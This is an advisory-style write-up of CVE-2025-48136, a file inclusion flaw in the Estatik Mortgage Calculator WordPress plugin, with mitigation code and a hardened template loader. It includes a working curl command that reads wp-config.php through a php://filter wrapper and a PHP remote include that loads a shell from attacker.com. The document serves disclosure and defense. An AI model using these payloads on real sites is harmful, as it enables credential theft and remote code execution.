How the CVE Works:
CVE-2025-48136 is a PHP Local File Inclusion (LFI) vulnerability in Estatik Mortgage Calculator (versions ≤ 2.0.12). The flaw arises from improper sanitization of user-supplied input passed to file inclusion functions (include, require). Attackers can manipulate dynamic file paths to load malicious PHP files from remote servers (RFI) or local directories (LFI), leading to arbitrary code execution. For example, a crafted request like `https://target.com/wp-content/plugins/estatik/?file=../../../wp-config.php` could expose sensitive configuration files.
DailyCVE Form:
Platform: WordPress Plugin
Version: ≤ 2.0.12
Vulnerability: PHP LFI/RFI
Severity: Critical
Date: 05/30/2025
Prediction: Patch by 06/15/2025
What Undercode Say:
Exploit:
curl -s "http://target.com/wp-content/plugins/estatik/?file=php://filter/convert.base64-encode/resource=wp-config.php" | base64 -d
PoC (PHP RFI):
<?php $url = "http://attacker.com/shell.txt"; include($url); // Executes remote PHP ?>
Mitigation:
1. Restrict file inclusion to whitelisted directories (the check must compare the resolved path against the allowed directory; comparing the raw filename against a list of directories with in_array() never matches and rejects every request):
$base = realpath('/safe/path/'); $real = realpath($file); if ($base === false || $real === false || strpos($real, $base . '/') !== 0) { die('Access denied'); }
2. Use `.htaccess` to block remote includes (allow_url_include is a PHP_INI_SYSTEM directive, so php.ini with `allow_url_include = Off` is the authoritative place; it has defaulted to Off since PHP 5.2 and is deprecated as of PHP 7.4):
php_flag allow_url_include Off
3. Update to Estatik v2.0.13+ (post-patch).
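The mitigation steps above amount to one rule: request input must never be turned into a path. The following is an added example, not code from the Estatik plugin, of a template loader for a WordPress plugin that applies that rule. It assumes the templates live in a `templates/` directory next to the plugin file, that the request selects one by a short key in the `file` parameter, and the names `ALLOWED_TEMPLATES`, `resolve_template` and `render_template` are this example's own.

```php
<?php
// Added example (not Estatik's code): a hardened template include for a
// WordPress plugin. Assumptions: templates live in $baseDir, and the request
// names them by a key from ALLOWED_TEMPLATES, never by a path.
declare(strict_types=1);

// Fixed table of request keys to files. User input only selects an entry here;
// "../../wp-config.php", "php://filter/..." and "http://..." match no key.
const ALLOWED_TEMPLATES = [
    'calculator' => 'calculator.php',
    'results'    => 'results.php',
];

// Resolve a template key to an absolute path inside $baseDir, or null.
// realpath() collapses symlinks and "..", so the containment check runs on the
// real location; the trailing separator stops "/base-other/" matching "/base".
function resolve_template(string $key, string $baseDir): ?string
{
    if (!array_key_exists($key, ALLOWED_TEMPLATES)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $path = realpath($base . ALLOWED_TEMPLATES[$key]);
    if ($path === false || strncmp($path, $base, strlen($base)) !== 0) {
        return null;
    }
    return $path;
}

// Include the selected template or fail closed with HTTP 400.
function render_template(string $baseDir): void
{
    $key  = (string) ($_GET['file'] ?? '');
    $path = resolve_template($key, $baseDir);
    if ($path === null) {
        http_response_code(400);
        exit('Invalid template');
    }
    include $path;
}

// Usage inside the plugin, with templates/ beside this file:
// render_template(__DIR__ . '/templates');
```

Even with the table lookup, the realpath containment check stays in place: it guards against a later edit that adds a table entry with a relative path, and against symlinks dropped into the templates directory, so the loader fails closed rather than relying on any single check.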
Detection (Linux):
grep -rnE "(include|require)(_once)?[[:space:]]*\(?[[:space:]]*\\\$_(GET|POST|REQUEST)" /var/www/html/
Impact Analysis:
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Exploitability: Low complexity, no auth required.
Patch Verification:
diff -u vulnerable.php patched.php | grep "sanitize_file_path"
References:
Reported By: nvd.nist.gov